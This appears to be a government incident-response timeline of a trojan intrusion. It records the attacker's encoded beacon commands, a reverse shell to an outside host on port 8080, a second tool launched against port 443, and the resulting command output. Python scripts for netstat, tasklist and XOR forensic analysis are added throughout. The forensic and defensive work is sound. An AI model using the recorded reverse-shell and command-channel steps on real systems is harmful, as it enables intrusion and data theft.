Timeline (EST)    Activity



7:27 am 



Attacker changes command on /C0927/Energy.htm to 
WSOGnRy5ny.5pp5plGpRpR. Attacker awaits beacon. 



8:31 am 



Trojan beacons out for /C0927/Energy.htm, hosted on hvmetal.com. Web 
server returns page with new command. Trojan receives new command: 
WSOGnRy5ny.5pp5pIGpR.pR and decrypts it to N:203.239.88.85.8080. 
This tells Trojan to establish reverse shell to 203.239.88.85 on port 8080. 



8:32 am 



One minute later, Trojan initiates reverse shell to 203.239.88.85 on port 
8080. Communication between 198.76.2.7 and 203.239.88.85 established. 
Attacker now has access to 198.76.2.7. Communication is encrypted for 
obscurity by XORing using 3F as encryption key. 



Attacker then runs the following commands on 198.76.2.7, remotely and
in succession:



He displays a list of applications and associated processes currently
running on the system:
C:\WINDOWS\system32>tasklist

Image Name                     PID Session Name        Session#    Mem Usage
========================= ======== ================ ======== ============
System Idle Process                Console                                16 K
System                           4 Console                               212 K
smss.exe                      1076 Console                               384 K
csrss.exe                     1140 Console                             3,300 K
winlogon.exe                  1164 Console                             9,688 K
services.exe                  1208 Console                             3,948 K
lsass.exe                     1220 Console                             6,108 K
svchost.exe                   1388 Console                             4,408 K
svchost.exe                   1456 Console                             3,888 K
svchost.exe                   1544 Console                            20,696 K
svchost.exe                   1608 Console                             3,040 K
svchost.exe                   1672 Console                             4,200 K
ccEvtMgr.exe                  1828 Console                             2,740 K
ccSetMgr.exe                  1844 Console                             3,976 K
SNDSrvc.exe                   1868 Console                             1,648 K
spoolsv.exe                    136 Console                             4,284 K
client32.exe                   336 Console                             4,992 K
CTsvcCDA.EXE                   440 Console                             1,196 K
DefWatch.exe                   460 Console                             3,420 K
DOEENS_Service.exe             504 Console                             8,604 K
mdm.exe                        548 Console                             2,820 K
DNAClient.exe                  568 Console                             9,020 K
SavRoam.exe                    752 Console                             4,376 K
Rtvscan.exe                    796 Console                            32,312 K
MsPMSPSv.exe                   864 Console                             1,404 K
iexplore.exe                  2292 Console                             8,652 K
logon.scr                     3128 Console                             4,964 K
Updatasched.exe               2072 Console                             1,564 K
Updatasched.exe               3320 Console                             1,340 K
tasklist.exe                  3212 Console                             4,096 K
wmiprvse.exe                  3200 Console                             5,356 K



He confirms that two instances of Updatasched.exe are running. Note: a
reference to Updatasched.exe was found in this variation of the msecur.dll
Trojan.



Attacker then lists active connections on 198.76.2.7:
C:\WINDOWS\system32>netstat -an

Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:2967           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:5405           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:6001           0.0.0.0:0              LISTENING
  TCP    198.76.2.7:139         0.0.0.0:0              LISTENING
  TCP    198.76.2.7:1093        203.239.88.85:8080     ESTABLISHED
  TCP    198.76.2.7:1122        203.239.88.85:8080     ESTABLISHED
  UDP    0.0.0.0:445            *:*
  UDP    0.0.0.0:500            *:*
  UDP    0.0.0.0:1027           *:*
  UDP    0.0.0.0:4500           *:*
  UDP    0.0.0.0:5405           *:*
  UDP    0.0.0.0:6003           *:*
  UDP    0.0.0.0:58000          *:*
  UDP    127.0.0.1:123          *:*
  UDP    198.76.2.7:123         *:*
  UDP    198.76.2.7:137         *:*
  UDP    198.76.2.7:138         *:*



Attacker confirms that there are two established connections to the hostile IP.
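The check the analyst performs by eye on the listing above (which sockets on the host point at an outside peer) is easy to automate over saved `netstat -an` output. The following is an added example and not code from the CIAC report: it parses a constructed listing built from the addresses in this timeline (198.76.2.7 and 203.239.88.85), drops LISTENING and UDP rows, which carry no peer, and groups the remaining TCP sockets by remote address. The trusted range 198.76.0.0/16 is an assumption for the sake of the example, not a fact from the report.

```python
from __future__ import annotations

import ipaddress
import re
from dataclasses import dataclass

# Constructed sample in `netstat -an` layout, using the addresses from the
# 8:32 am and 8:34 am listings in this report (not a verbatim capture).
SAMPLE_NETSTAT = """\
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
  TCP    198.76.2.7:139         0.0.0.0:0              LISTENING
  TCP    198.76.2.7:1093        203.239.88.85:8080     ESTABLISHED
  TCP    198.76.2.7:1122        203.239.88.85:8080     ESTABLISHED
  TCP    198.76.2.7:1123        203.239.88.85:443      SYN_SENT
  UDP    0.0.0.0:445            *:*
  UDP    198.76.2.7:137         *:*
"""


@dataclass(frozen=True)
class Conn:
    proto: str
    local_ip: str
    local_port: int
    remote_ip: str
    remote_port: int   # 0 for UDP rows, which show no peer
    state: str         # '' for UDP rows


_ROW = re.compile(r"^\s*(TCP|UDP)\s+(\S+):(\d+)\s+(\S+):(\S+)(?:\s+(\S+))?\s*$")


def parse_netstat(text: str) -> list[Conn]:
    """Turn `netstat -an` rows into Conn records; headings do not match."""
    conns = []
    for line in text.splitlines():
        m = _ROW.match(line)
        if not m:
            continue
        proto, lip, lport, rip, rport, state = m.groups()
        conns.append(Conn(proto, lip, int(lport), rip,
                          int(rport) if rport.isdigit() else 0, state or ""))
    return conns


def suspicious_peers(conns: list[Conn], trusted_nets=()) -> list[Conn]:
    """TCP sockets whose peer is outside loopback, unspecified and trusted nets.

    SYN_SENT rows are kept on purpose: a half-open attempt, like the one to
    port 443 at 8:34 am, is still evidence of an outbound connection request.
    """
    trusted = [ipaddress.ip_network(n) for n in trusted_nets]
    flagged = []
    for c in conns:
        if c.proto != "TCP" or c.state == "LISTENING":
            continue
        try:
            peer = ipaddress.ip_address(c.remote_ip)
        except ValueError:
            continue   # '*' or an unparsable address
        if peer.is_loopback or peer.is_unspecified:
            continue
        if any(peer in net for net in trusted):
            continue
        flagged.append(c)
    return flagged


def by_peer(flagged: list[Conn]) -> dict:
    """Group flagged sockets by remote address: peer -> [(port, state), ...]."""
    out = {}
    for c in flagged:
        out.setdefault(c.remote_ip, []).append((c.remote_port, c.state))
    return out


if __name__ == "__main__":
    # 198.76.0.0/16 is an assumed site range for this example only.
    hits = suspicious_peers(parse_netstat(SAMPLE_NETSTAT),
                            trusted_nets=["198.76.0.0/16"])
    for peer, socks in by_peer(hits).items():
        print(peer, sorted(socks))
```

Run against the constructed listing it reports a single peer, 203.239.88.85, with two ESTABLISHED sockets on 8080 and one SYN_SENT to 443, which is exactly the picture the analyst draws from the two netstat listings in this timeline. Rows whose local port is an ephemeral client port (1093, 1122, 1123 here) and whose peer is external are the reverse-shell signature worth alerting on.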



Attacker runs a tasklist command again:
C:\WINDOWS\system32>tasklist

Image Name                     PID Session Name        Session#    Mem Usage
========================= ======== ================ ======== ============
System Idle Process                Console                                16 K
System                           4 Console                               212 K
smss.exe                      1076 Console                               384 K
csrss.exe                     1140 Console                             3,300 K
winlogon.exe                  1164 Console                             9,688 K
services.exe                  1208 Console                             3,948 K
lsass.exe                     1220 Console                             6,108 K
svchost.exe                   1388 Console                             4,424 K
svchost.exe                   1456 Console                             3,888 K
svchost.exe                   1544 Console                            20,876 K
svchost.exe                   1608 Console                             3,040 K
svchost.exe                   1672 Console                             4,200 K
ccEvtMgr.exe                  1828 Console                             2,740 K
ccSetMgr.exe                  1844 Console                             3,976 K
SNDSrvc.exe                   1868 Console                             1,648 K
spoolsv.exe                    136 Console                             4,284 K
client32.exe                   336 Console                             4,992 K
CTsvcCDA.EXE                   440 Console                             1,196 K
DefWatch.exe                   460 Console                             3,420 K
DOEENS_Service.exe             504 Console                             8,604 K
mdm.exe                        548 Console                             2,820 K
DNAClient.exe                  568 Console                             9,020 K
SavRoam.exe                    752 Console                             4,376 K
Rtvscan.exe                    796 Console                            32,312 K
MsPMSPSv.exe                   864 Console                             1,404 K
iexplore.exe                  2292 Console                             8,652 K
logon.scr                     3128 Console                             4,964 K
Updatasched.exe               2072 Console                             1,564 K
Updatasched.exe               3320 Console                             1,344 K
wmiprvse.exe                  3200 Console                             5,560 K
tasklist.exe                  3792 Console                             4,096 K



Official Use Only                3                2/22/2006
Official Use Only

Computer Incident Advisory Capability (CIAC)
Office of the Chief Information Officer
Office of Cyber Security    925-422-8193    1-866-901-CIAC



He then navigates up one level and down into the help directory:
C:\WINDOWS\system32>cd ..\help



Attacker now is interested in fr.exe and tries to make sure the file exists.
This is confirmed below:
C:\WINDOWS\help>dir fr.exe
 Volume in drive C has no label.
 Volume Serial Number is 88F3-5429

 Directory of C:\WINDOWS\Help

02/09/2006  08:20 AM            45,056 fr.exe
               1 File(s)         45,056 bytes
                 Dir(s)  24,998,223,872 bytes free



8:34 am



Attacker then launches the fr.exe program. From the time stamp above, it
seems he uploaded fr.exe onto 198.76.2.7 around 8:20 am. The traffic to
443 is encrypted with a different XOR key:
C:\WINDOWS\help>fr 203.239.88.85 443



Attacker wants to know whether the connection attempt worked:
C:\WINDOWS\help>netstat -an
Nr IP:203.239.88.85 Nr port: 443

Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:2967           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:5405           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:6001           0.0.0.0:0              LISTENING
  TCP    198.76.2.7:139         0.0.0.0:0              LISTENING
  TCP    198.76.2.7:1093        203.239.88.85:8080     ESTABLISHED
  TCP    198.76.2.7:1122        203.239.88.85:8080     ESTABLISHED
  TCP    198.76.2.7:1123        203.239.88.85:443      SYN_SENT
  UDP    0.0.0.0:445            *:*
  UDP    0.0.0.0:500            *:*
  UDP    0.0.0.0:1027           *:*
  UDP    0.0.0.0:4500           *:*
  UDP    0.0.0.0:5405           *:*
  UDP    0.0.0.0:6003           *:*
  UDP    0.0.0.0:58000          *:*
  UDP    127.0.0.1:123          *:*
  UDP    198.76.2.7:123         *:*
  UDP    198.76.2.7:137         *:*
  UDP    198.76.2.7:138         *:*



He makes sure that fr.exe really kicked off:
C:\WINDOWS\help>tasklist

Image Name                     PID Session Name        Session#    Mem Usage
========================= ======== ================ ======== ============
System Idle Process                Console                                16 K
System                           4 Console                               212 K
smss.exe                      1076 Console                               384 K
csrss.exe                     1140 Console                             3,308 K
winlogon.exe                  1164 Console                             9,692 K
services.exe                  1208 Console                             3,948 K
lsass.exe                     1220 Console                             6,112 K
svchost.exe                   1388 Console                             4,424 K
svchost.exe                   1456 Console                             3,896 K
svchost.exe                   1544 Console                            20,864 K
svchost.exe                   1608 Console                             3,040 K
svchost.exe                   1672 Console                             4,200 K
ccEvtMgr.exe                  1828 Console                             2,740 K
ccSetMgr.exe                  1844 Console                             3,976 K
SNDSrvc.exe                   1868 Console                             1,648 K
spoolsv.exe                    136 Console                             4,284 K
client32.exe                   336 Console                             4,992 K
CTsvcCDA.EXE                   440 Console                             1,196 K
DefWatch.exe                   460 Console                             3,420 K
DOEENS_Service.exe             504 Console                             8,604 K
mdm.exe                        548 Console                             2,828 K
DNAClient.exe                  568 Console                             9,020 K
SavRoam.exe                    752 Console                             4,376 K
Rtvscan.exe                    796 Console                            32,312 K
MsPMSPSv.exe                   864 Console                             1,404 K
iexplore.exe                  2292 Console                             8,652 K
logon.scr                     3128 Console                             4,964 K
Updatasched.exe               2072 Console                             1,564 K
Updatasched.exe               3320 Console                             1,532 K
fr.exe                        3848 Console                             1,544 K






tasklist.exe                  3964 Console                             4,096 K
wmiprvse.exe                  1408 Console                             5,356 K



Attacker is apparently finished with the port 443 connection. He tries to
stop the fr.exe process using tskill along with the process ID. Access was
denied, however:

C:\WINDOWS\help>tskill 3848

End process failed for 3848: access is denied



He lists the tasks once more, and apparently fr.exe is no longer a running
process:

C:\WINDOWS\help>tasklist

Image Name                     PID Session Name        Session#    Mem Usage
========================= ======== ================ ======== ============
System Idle Process                Console                                16 K
System                           4 Console                               212 K
smss.exe                      1076 Console                               384 K
csrss.exe                     1140 Console                             3,300 K
winlogon.exe                  1164 Console                             9,692 K
services.exe                  1208 Console                             3,948 K
lsass.exe                     1220 Console                             6,112 K
svchost.exe                   1388 Console                             4,488 K
svchost.exe                   1456 Console                             3,888 K
svchost.exe                   1544 Console                            20,740 K
svchost.exe                   1608 Console                             3,040 K
svchost.exe                   1672 Console                             4,200 K
ccEvtMgr.exe                  1828 Console                             2,740 K
ccSetMgr.exe                  1844 Console                             3,976 K
SNDSrvc.exe                   1868 Console                             1,648 K
spoolsv.exe                    136 Console                             4,284 K
client32.exe                   336 Console                             4,992 K
CTsvcCDA.EXE                   440 Console                             1,196 K
DefWatch.exe                   460 Console                             3,420 K
DOEENS_Service.exe             504 Console                             8,604 K
mdm.exe                        548 Console                             2,828 K
DNAClient.exe                  568 Console                             9,020 K
SavRoam.exe                    752 Console                             4,376 K
Rtvscan.exe                    796 Console                            32,312 K
MsPMSPSv.exe                   864 Console                             1,404 K
iexplore.exe                  2292 Console                             8,652 K
logon.scr                     3128 Console                             4,964 K
Updatasched.exe               2072 Console                             1,564 K
Updatasched.exe               3320 Console                             1,536 K
tasklist.exe                  3192 Console                             4,096 K
wmiprvse.exe                  4044 Console                             5,356 K
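The four tasklist listings in this timeline are read by comparing them pairwise: fr.exe (PID 3848) is present at 8:34 am and absent in the next listing, and Updatasched.exe appears twice throughout. The following is an added example, not code from the CIAC report, that does that comparison mechanically. It parses the tasklist layout shown above, keys processes on (image name, PID) so a restarted process with a new PID shows up as an exit plus a start, and lets the caller name images whose churn is expected (tasklist.exe and wmiprvse.exe change PID in every listing here). The three snapshots are constructed, shortened versions of the report's listings; the PIDs are the ones the listings show.

```python
from __future__ import annotations

import re
from typing import NamedTuple


class Proc(NamedTuple):
    image: str
    pid: int
    session: str
    mem_kb: int


# Image name (may contain spaces), PID, session name, optional session number,
# memory in K. Session# is optional because it did not survive in the scanned
# listings; real tasklist output always carries it.
_ROW = re.compile(
    r"^(?P<image>.+?)\s+(?P<pid>\d+)\s+(?P<session>\S+)(?:\s+\d+)?\s+(?P<mem>[\d,]+)\s*K\s*$"
)


def parse_tasklist(text: str) -> list[Proc]:
    """Parse `tasklist` output; the header and separator lines do not match."""
    procs = []
    for line in text.splitlines():
        m = _ROW.match(line.rstrip())
        if m:
            procs.append(Proc(m["image"].strip(), int(m["pid"]), m["session"],
                              int(m["mem"].replace(",", ""))))
    return procs


def instances(procs: list[Proc], image: str) -> list[Proc]:
    """All processes running under the given image name (case-insensitive)."""
    return [p for p in procs if p.image.lower() == image.lower()]


def diff_snapshots(before, after, ignore=frozenset()):
    """Return (started, exited) between two snapshots, keyed on (image, PID).

    `ignore` names images whose churn is expected and should not be reported.
    """
    skip = {i.lower() for i in ignore}
    b = {(p.image.lower(), p.pid): p for p in before if p.image.lower() not in skip}
    a = {(p.image.lower(), p.pid): p for p in after if p.image.lower() not in skip}
    started = sorted((a[k] for k in a.keys() - b.keys()), key=lambda p: p.pid)
    exited = sorted((b[k] for k in b.keys() - a.keys()), key=lambda p: p.pid)
    return started, exited


# Constructed, shortened snapshots (not verbatim from the report).
SNAP_0832 = """\
Image Name                     PID Session Name        Session#    Mem Usage
========================= ======== ================ ======== ============
System                           4 Console                 0        212 K
smss.exe                      1076 Console                 0        384 K
svchost.exe                   1388 Console                 0      4,408 K
Updatasched.exe               2072 Console                 0      1,564 K
Updatasched.exe               3320 Console                 0      1,340 K
tasklist.exe                  3212 Console                 0      4,096 K
wmiprvse.exe                  3200 Console                 0      5,356 K
"""
SNAP_0834 = """\
System                           4 Console                 0        212 K
smss.exe                      1076 Console                 0        384 K
svchost.exe                   1388 Console                 0      4,424 K
Updatasched.exe               2072 Console                 0      1,564 K
Updatasched.exe               3320 Console                 0      1,532 K
fr.exe                        3848 Console                 0      1,544 K
tasklist.exe                  3964 Console                 0      4,096 K
wmiprvse.exe                  1408 Console                 0      5,356 K
"""
SNAP_AFTER_TSKILL = """\
System                           4 Console                 0        212 K
smss.exe                      1076 Console                 0        384 K
svchost.exe                   1388 Console                 0      4,488 K
Updatasched.exe               2072 Console                 0      1,564 K
Updatasched.exe               3320 Console                 0      1,536 K
tasklist.exe                  3192 Console                 0      4,096 K
wmiprvse.exe                  4044 Console                 0      5,356 K
"""

EXPECTED_CHURN = {"tasklist.exe", "wmiprvse.exe"}

if __name__ == "__main__":
    s0, s1, s2 = (parse_tasklist(t) for t in (SNAP_0832, SNAP_0834, SNAP_AFTER_TSKILL))
    print("Updatasched.exe PIDs:", [p.pid for p in instances(s0, "Updatasched.exe")])
    for label, x, y in (("08:32 -> 08:34", s0, s1), ("08:34 -> after tskill", s1, s2)):
        started, exited = diff_snapshots(x, y, EXPECTED_CHURN)
        print(label, "started:", [(p.image, p.pid) for p in started],
              "exited:", [(p.image, p.pid) for p in exited])
```

Keying on (image, PID) rather than image alone is what makes the two Updatasched.exe instances visible as two distinct processes, and it is also why a process that is killed and relaunched is reported as both an exit and a start instead of being silently treated as unchanged.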



He then deletes fr.exe:
C:\WINDOWS\help>del fr.exe



Moving on, he lists the entire contents of the help directory. Apparently,
he is interested in the existence of a few files or directories:
C:\WINDOWS\help>dir

[-]

07/17/2002  04:32 AM            24,567 regopt.chm
07/17/2002  04:33 AM            33,427 hschelp.chm
07/17/2002  04:33 AM            24,285 input.hlp
07/17/2002  04:33 AM            15,071 hardware.hlp
11/04/2002  06:02 PM           613,334 wmplayer.chm
12/11/2002  11:14 PM            24,759 dxdiag.chm
05/02/2003  02:19 PM            23,662 nvwcppt.hlp
05/02/2003  02:19 PM            23,494 nvwcpptb.hlp
05/02/2003  02:19 PM            24,149 nvwcpru.hlp
05/02/2003  02:19 PM            23,937 nvwcppl.hlp
05/02/2003  02:19 PM            22,919 nvwcpno.hlp
05/02/2003  02:19 PM            23,097 nvwcpnl.hlp
05/02/2003  02:19 PM            22,977 nvwcplen.hlp
05/02/2003  02:19 PM            33,084 nvwcpko.hlp
05/02/2003  02:19 PM            32,944 nvwcpja.hlp
05/02/2003  02:19 PM            23,297 nvwcpit.hlp
05/02/2003  02:19 PM            26,819 nvwcphu.hlp
05/02/2003  02:19 PM            24,389 nvwcpsk.hlp
05/02/2003  02:19 PM            23,449 nvwcphe.hlp
05/02/2003  02:19 PM            23,262 nvwcpfr.hlp
05/02/2003  02:19 PM            23,322 nvwcpfi.hlp
05/02/2003  02:19 PM            21,907 nvwcpesm.hlp
05/02/2003  02:19 PM            21,880 nvwcpes.hlp
05/02/2003  02:19 PM            23,455 nvwcpsl.hlp
05/02/2003  02:19 PM            23,253 nvwcpsv.hlp
05/02/2003  02:19 PM            20,453 nvwcpeng.hlp
05/02/2003  02:19 PM            25,634 nvwcptr.hlp
05/02/2003  02:19 PM            24,155 nvwcpde.hlp
05/02/2003  02:19 PM            23,275 nvwcpda.hlp
05/02/2003  02:19 PM            24,777 nvwcpes.hlp
05/02/2003  02:19 PM            22,833 nvwcpar.hlp
05/02/2003  02:19 PM            64,921 nvcpzht.hlp
05/02/2003  02:19 PM            65,219 nvcpzhc.hlp
05/02/2003  02:19 PM            60,678 nvcptr.hlp
05/02/2003  02:19 PM            72,751 nvcpth.hlp
05/02/2003  02:19 PM            54,457 nvcpsv.hlp
05/02/2003  02:19 PM            55,756 nvcpsl.hlp
05/02/2003  02:19 PM            86,673 nvcpsk.hlp
05/02/2003  02:19 PM            57,406 nvcpru.hlp
05/02/2003  02:19 PM            53,767 nvcpptb.hlp
05/02/2003  02:19 PM            53,072 nvcppt.hlp
05/02/2003  02:19 PM            57,780 nvcppl.hlp
05/02/2003  02:19 PM            54,358 nvcpno.hlp
05/02/2003  02:19 PM            53,770 nvcpnl.hlp
05/02/2003  02:19 PM            50,792 nvcpl.hlp
05/02/2003  02:19 PM            33,425 nvwcpth.hlp
05/02/2003  02:19 PM            87,057 nvcpko.hlp
05/02/2003  02:19 PM            80,143 nvcpja.hlp
05/02/2003  02:19 PM            53,182 nvcpit.hlp
05/02/2003  02:19 PM            58,809 nvcphu.hlp
05/02/2003  02:19 PM            78,982 nvcphe.hlp
05/02/2003  02:19 PM            54,995 nvcpfr.hlp
05/02/2003  02:19 PM            55,946 nvcpfi.hlp
05/02/2003  02:19 PM            53,497 nvcpesm.hlp
05/02/2003  02:19 PM            24,017 nvwcpel.hlp
05/02/2003  02:19 PM            52,949 nvcpes.hlp
05/02/2003  02:19 PM            50,690 nvcpeng.hlp
05/02/2003  02:19 PM            56,415 nvcpde.hlp
05/02/2003  02:19 PM            54,358 nvcpda.hlp
05/02/2003  02:19 PM            26,920 nvwcpzht.hlp
05/02/2003  02:19 PM            77,671 nvcpar.hlp
05/02/2003  02:19 PM            85,508 nvcpes.hlp
07/25/2003  10:07 AM    <DIR>          Tours
07/28/2003  12:31 PM            11,403 javaperm.hlp
07/28/2003  12:31 PM            21,444 javasec.hlp
07/28/2003  12:41 PM    <DIR>          mui
06/25/2004  12:19 AM            56,388 mswmc.chm
07/17/2004  10:33 AM           269,916 comexp.chm
07/17/2004  10:35 AM            38,132 iis.chm
07/17/2004  10:36 AM           488,023 msmqconcepts.chm
07/17/2004  10:39 AM           253,201 msoe.chm
07/17/2004  10:40 AM            204,81 iexplore.chm






07/17/2004  10:40 AM            22,219 atm.chm
07/17/2004  10:40 AM            18,855 datetime.chm
07/17/2004  10:40 AM            64,768 evconcepts.chm
07/17/2004  10:40 AM            48,179 howto.chm
07/17/2004  10:40 AM            77,945 filefold.chm
07/17/2004  10:40 AM            32,171 hardware.chm
07/17/2004  10:40 AM            48,494 file_srv.chm
07/17/2004  10:40 AM            54,004 dskquoui.chm
07/17/2004  10:40 AM           219,609 ipsecconcepts.chm
07/17/2004  10:40 AM            32,564 license.chm
07/17/2004  10:40 AM           154,065 ipv6.chm
07/17/2004  10:40 AM            44,271 msinfo32.chm
07/17/2004  10:40 AM            37,318 mstask.chm
07/17/2004  10:40 AM            67,569 mstsc.chm
07/17/2004  10:40 AM            56,768 mode.chm
07/17/2004  10:40 AM            79,196 misc.chm
07/17/2004  10:40 AM           111,575 network.chm
07/17/2004  10:40 AM           535,789 netcfg.chm
07/17/2004  10:40 AM            20,257 ntchowto.chm
07/17/2004  10:40 AM            81,426 ntdef.chm
07/17/2004  10:40 AM           271,333 nusrmgr.chm
07/17/2004  10:40 AM            21,891 password.chm
07/17/2004  10:40 AM            98,833 printing.chm
07/17/2004  10:40 AM            45,830 rsop.chm
07/17/2004  10:40 AM            35,052 rdesktop.chm
07/17/2004  10:40 AM            20,126 remasst.chm
07/17/2004  10:40 AM           119,885 spolsconcepts.chm
07/17/2004  10:40 AM            17,304 sr_ui.chm
07/17/2004  10:40 AM            20,233 spad.chm
07/17/2004  10:40 AM           202,413 spconcepts.chm
07/17/2004  10:40 AM            18,379 sendcmsg.chm
07/17/2004  10:40 AM            35,403 sysrestore.chm
07/17/2004  10:40 AM            32,400 sys_srv.chm
07/17/2004  10:40 AM            16,643 webpub.chm
07/17/2004  10:40 AM            45,068 twclient.chm
07/17/2004  10:40 AM            12,488 twclient.hlp
07/17/2004  10:40 AM            46,130 wschelp.chm
07/17/2004  10:43 AM            50,059 blutooth.chm
07/17/2004  09:54 PM         1,104,994 windows.chq
07/17/2004  09:54 PM            20,170 wuau.chm
07/17/2004  09:54 PM            22,555 conf.chm
07/17/2004  09:54 PM            61,279 updatel.chm
07/17/2004  09:54 PM           165,024 inetres.chm
07/17/2004  09:54 PM            23,195 wmplay.chm
07/17/2004  09:54 PM           376,086 cpanel.chq
07/17/2004  09:54 PM           462,338 system.chm
08/03/2004  11:56 PM            34,816 sniffpol.dll
08/03/2004  11:56 PM            33,280 sstub.dll
08/03/2004  11:56 PM           279,040 tshoot.dll
08/04/2004  12:02 AM            79,996 apps.chm
08/04/2004  12:02 AM           299,152 apps_sp.chm
02/18/2005  03:23 PM             5,058 hhcolreg.dat
05/26/2005  04:16 AM            74,909 wuauhelp.chm
09/29/2005  11:19 AM             6,416 hlp.hlp
09/29/2005  12:26 PM    <DIR>          mail
02/09/2006  08:38 AM    <DIR>
02/09/2006  08:38 AM    <DIR>
             440 File(s)     26,743,239 bytes
               5 Dir(s)  24,998,252,544 bytes free



From the creation date of the mail directory above, we can see that it was
uploaded around the same time wauserv.dll and vvbc.exe were used to
exfiltrate data from DOE HQ. He changes into the mail directory...
C:\WINDOWS\help>cd mail

... and lists that directory. Everything seems intact:
C:\WINDOWS\help\mail>dir

 Volume in drive C has no label.
 Volume Serial Number is 88F3-5429

 Directory of C:\WINDOWS\Help\mail

09/29/2005  12:26 PM    <DIR>
09/29/2005  12:26 PM    <DIR>
07/17/2004  10:36 AM               354 smtpsnap.cnt
07/17/2004  10:36 AM            72,347 smtpsnap.hlp
               2 File(s)         72,701 bytes
               2 Dir(s)  24,998,252,544 bytes free



Finally, he issues some sort of sleep command:

C:\WINDOWS\help\mail>sleep 10
Sleep Time (*10m):10



8:38 am 



Communication on port 443 ends.

We have yet to decipher the communication that took place on port 443.
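The 8:32 am entry states that the port 8080 channel was obscured by XORing with the single-byte key 3F, and the 8:34 am entry that the port 443 channel used a different key that is still undetermined. For a one-byte key the recovery is a 256-way search: try every key, keep the one whose output looks most like the command-shell text a reverse shell carries, and use a known marker (a DOS prompt, here) to break ties between keys that both give printable output. The following is an added example and not code from the CIAC report; it generalizes from the known 3F case to key recovery. The two captures are constructed inside the script (shell-like text XORed with 0x3F and with a stand-in key 0xA7) and are not bytes from the incident.

```python
from __future__ import annotations

import string

PRINTABLE = set(string.printable.encode())


def xor_bytes(data: bytes, key: int) -> bytes:
    """XOR every byte with a one-byte key; applying it twice restores the input."""
    return bytes(b ^ key for b in data)


def printable_score(buf: bytes) -> float:
    """Fraction of bytes that are printable ASCII (1.0 = all printable)."""
    if not buf:
        return 0.0
    return sum(b in PRINTABLE for b in buf) / len(buf)


def recover_key(cipher: bytes, hints=(b"C:\\", b">")) -> tuple[int, float]:
    """Return (key, score) for the best single-byte XOR key.

    The score is the printable fraction plus a small bonus per hint found.
    The bonus matters because keys that differ from the right one in a low
    bit can also yield fully printable, but meaningless, text.
    """
    best = (0, -1.0)
    for key in range(256):
        plain = xor_bytes(cipher, key)
        score = printable_score(plain) + 0.05 * sum(h in plain for h in hints)
        if score > best[1]:
            best = (key, score)
    return best


def decode_capture(cipher: bytes) -> tuple[int, bytes]:
    """Recover the key and return (key, decoded bytes)."""
    key, _ = recover_key(cipher)
    return key, xor_bytes(cipher, key)


# Constructed captures (NOT from the incident): shell-like text XORed here.
TRANSCRIPT_8080 = b"C:\\WINDOWS\\system32>tasklist\r\nImage Name  PID\r\nfr.exe  3848\r\n"
CAPTURE_8080 = xor_bytes(TRANSCRIPT_8080, 0x3F)     # key the report gives for 8080
UNKNOWN_KEY = 0xA7                                    # stand-in for the 443 key
TRANSCRIPT_443 = b"C:\\WINDOWS\\help>dir mail\r\n 2 File(s)  72,701 bytes\r\n"
CAPTURE_443 = xor_bytes(TRANSCRIPT_443, UNKNOWN_KEY)

if __name__ == "__main__":
    for name, cap in (("8080", CAPTURE_8080), ("443", CAPTURE_443)):
        key, plain = decode_capture(cap)
        print(f"port {name}: key=0x{key:02X} -> {plain!r}")
```

The same search works on a packet payload pulled from a capture file; the only thing to adjust is the hint list, which should contain strings the protocol on that channel is known to carry. If no key scores well, the channel is using something stronger than a repeating single byte, which is itself a useful finding.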



8:40 am 



Communication on port 8080 ends. 



8:44 am 



Attacker resets command on /C0927/Energy.htm to WSFGcne5R5R5cG7. 




11:58 am



Trojan beacons out for Energy.htm. Web server returns page with new
command. Trojan receives new command: WSFGcne5R5R5cG7. Trojan is
sent back to sleep.



************************************************************



This particular attack was initially discovered by [redacted]. [redacted], as well
as initial analysis, was provided by [redacted]. The [redacted] was provided by
[redacted (b)(7)(C)]. [redacted] of the IARC is currently working on an [redacted].









For questions regarding this document, please contact [redacted (b)(7)(C)].






